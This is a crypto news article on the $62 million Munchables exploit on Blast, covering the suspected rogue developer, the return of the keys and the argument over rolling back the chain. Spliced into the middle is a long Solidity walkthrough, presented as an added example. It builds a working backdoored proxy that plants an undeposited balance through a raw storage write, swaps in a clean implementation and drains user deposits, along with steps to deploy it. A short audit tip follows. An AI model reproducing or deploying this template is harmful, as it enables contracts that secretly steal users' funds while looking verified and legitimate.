An NFT game on the Blast network lost $62 million in an onchain exploit, but some industry watchers have suggested that the attack was an inside job planned by a rogue developer.
Posted on March 27, 2024 at 2:44 AM EST.
Munchables, a non-fungible token (NFT) game built on Ethereum layer 2 network Blast, suffered a multi-million dollar exploit on Tuesday, with blockchain sleuths raising questions about the authenticity of the protocol.
The team behind the project confirmed in an X post that the protocol had been compromised, saying that they were tracking the exploiter’s movements and attempting to block the transactions.
Exploiter address 17.4K ETH ($62.5M)
0x6e8836f050a315611208a5cd7e228701563d09c5
— ZachXBT (@zachxbt) March 26, 2024
Blockchain sleuth ZachXBT responded to Munchables’ X post with a link to the exploiter’s wallet address, which received a transfer of 17,413 ether (ETH), according to data from block explorer Blastscan. At current prices, the value of the stolen funds amounted to $62.6 million.
According to Solidity developer “0xQuit” on X, there was nothing complex about this exploit, based on the nature of the underlying smart contract, which was “dangerously upgradeable” with an unverified implementation contract.
“The exploit appears to be as simple as asking the contract politely for 17,400 ether,” said 0xQuit, adding that “the attack does require you to be an authorized party and was probably an inside job by a rogue dev.”
That rogue developer may be based in North Korea, according to ZachXBT, who linked a developer profile with the alias “Werewolves0943.”
not even joking it’s this clown pic.twitter.com/V0Cg4st91t
— ZachXBT (@zachxbt) March 26, 2024
0xQuit noted that the exploit appears to have been planned from the beginning: the exploiter manually wrote to the contract’s storage slots to assign himself a large ether balance, then switched the proxy’s implementation back to one that appeared legitimate.
“Then he simply withdrew that balance once TVL [Total Value Locked] was juicy enough,” said 0xQuit.
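The mechanism 0xQuit describes, shown as an added example rather than anything taken from Munchables’ contracts. Every contract, function and value below is hypothetical; the layout assumes a balances mapping at storage slot 0 behind an ERC-1967 proxy, and the attacker is simply the account that deployed the proxy.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical proxy, not Munchables' code. The implementation address lives in
// the ERC-1967 slot so it never collides with the implementation's own layout.
contract UpgradeableProxy {
    bytes32 internal constant IMPL_SLOT =
        0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
    address public immutable admin;

    constructor(address impl) {
        admin = msg.sender;
        _setImplementation(impl);
    }

    function upgradeTo(address impl) external {
        require(msg.sender == admin, "not admin");
        _setImplementation(impl);
    }

    function _setImplementation(address impl) internal {
        bytes32 slot = IMPL_SLOT;
        assembly { sstore(slot, impl) }
    }

    // Everything else is delegatecalled: the implementation's code runs against
    // the proxy's storage and the proxy's ether balance.
    fallback() external payable {
        bytes32 slot = IMPL_SLOT;
        assembly {
            let impl := sload(slot)
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    receive() external payable {}
}

// The implementation users end up seeing: verified source, honest accounting.
contract LockDrop {
    mapping(address => uint256) public balances; // proxy storage slot 0

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance");
        balances[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// The implementation the rogue deployer installs first: a raw storage write.
// Left unverified on the explorer, it is just opaque bytecode.
contract Backdoor {
    function setSlot(bytes32 slot, bytes32 value) external {
        assembly { sstore(slot, value) }
    }
}

contract Victim {
    function deposit(LockDrop app) external payable {
        app.deposit{value: msg.value}();
    }
}

// The sequence 0xQuit describes, run by the deployer (this contract is the attacker).
contract Walkthrough {
    // Slot of balances[who] for a mapping at slot 0: keccak256(key . slot). A defender
    // can read it with eth_getStorageAt(proxy, balanceSlot(who)) and reconcile it
    // against that account's actual deposit transactions.
    function balanceSlot(address who) public pure returns (bytes32) {
        return keccak256(abi.encode(who, uint256(0)));
    }

    // Attach some ether (at most 17,400); it stands in for the victims' deposits.
    function run() external payable returns (uint256 phantom, uint256 drained) {
        // 1. Go live with the backdoor as the first implementation.
        UpgradeableProxy proxy = new UpgradeableProxy(address(new Backdoor()));
        // 2. Plant a balance nobody deposited, straight into the proxy's storage.
        Backdoor(address(proxy)).setSlot(balanceSlot(address(this)), bytes32(uint256(17_400 ether)));
        // 3. Swap in the legitimate implementation and verify only that one publicly.
        proxy.upgradeTo(address(new LockDrop()));
        LockDrop app = LockDrop(address(proxy));
        phantom = app.balances(address(this)); // 17_400 ether, yet nothing was deposited
        // 4. Users deposit; once TVL is high enough the attacker just withdraws.
        new Victim().deposit{value: msg.value}(app);
        uint256 before = address(this).balance;
        app.withdraw(msg.value);
        drained = address(this).balance - before; // equals msg.value, the whole TVL
    }

    receive() external payable {}
}
```

Deploy Walkthrough and call run() with some ether attached from a Remix or Foundry session. The point for a reviewer is that after step 3 the explorer shows a verified, harmless LockDrop, and only two things betray the setup: the proxy’s transaction history contains an earlier upgrade to an unverified implementation, and eth_getStorageAt on balanceSlot(attacker) returns a value that no deposit transaction accounts for. Checking the upgrade history and reconciling storage against on-chain deposits is the audit step an unverified, upgradeable contract demands before any TVL goes in.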
Around seven hours after the exploit was announced, the Munchables team issued an update saying that the rogue developer in question had agreed to share the keys to the funds without imposing any conditions.
How are you still referring to this person as the “Munchables developer”…you not gonna fire them?
— Bender (@0xBender) March 27, 2024
The team later confirmed that the developer had shared all the private keys required to recover the funds, and said that they had set up a treasury pool for affected users to recover their assets.
“We’ve just opened up the final proposal for all users to vote on the Munchables compensation date. Those who vote within the next 12 hours will receive a double allocation,” said the Munchables team.
Reversing the damage
Some users on Crypto Twitter called for Blast to “roll back the chain,” an intervention by the network’s operators that would, in effect, reverse the hack. In practice, this would mean Blast posting a state root to layer 1 that does not match the chain’s actual execution, so that the exploit transaction is effectively erased from the state the bridge recognizes.
Expectedly, this led to much debate around whether changing the state of the chain goes against the ethos of decentralization or whether a situation like this warrants the necessary intervention.
There’s a reason decentralization is important.
This Blast hack shows us why. If they can arbitrarily change the chain state to reverse the hack–which they can–what’s stopping them from stealing user funds?
Even if all the validators on an L1 are compromised, no one can…
— ZenLlama (@zen_llama) مارس 27، 2024
”blast executing a bridge upgrade would destroy the facade of decentralization”
what the fuck are you guys talking about
what ”facade of decentralization”?
there is no fucking mystery here. it is 100% centralized
rollback the chain you absolute morons pic.twitter.com/Cv9YCYKKZs
— Eric Wall | OP_😺 (@ercwl) March 27, 2024
If $62mm more of hacked funds goes to NK (or is alleged to go to NK), it’s night night for crypto in the U.S.
Roll back the chain. Blast is a month old and can afford the debate.
— Ryan Selkis (d/acc) 🇺🇸 (@twobitidiot) March 27, 2024
“As I understand the situation, they aren’t rolling back the chain, they are submitting an invalid state root from the layer 2 sequencer down onto layer 1 Ethereum,” said Tim Clancy, an industry watcher who identifies as an Ethereum maximalist, to Unchained.
He explained that the most important thing about a layer 2 is a provable and trustless “exit window,” which is a period of time that allows someone to escape the layer 2 with all assets.
“If there is no exit window, the [layer 2] is 100% centralized and the operators can act to steal your assets,” he said.
According to L2 Beat, Blast has no exit window that would let users leave the network ahead of an unwanted upgrade.
“In this case of Blast abusing their lack of exit window to steal the attacker’s funds, I believe they are unfortunately setting a precedent that regulators or authorities may use to attack honest and talented teams that are actually believers in this space and actually building trustless scaling solutions,” Clancy said.
March 27 04:46am ET: This article’s headline has been updated.
Source: https://unchainedcrypto.com/third-party-blast-bridges-disabled-after-munchables-loses-62-million-in-exploit/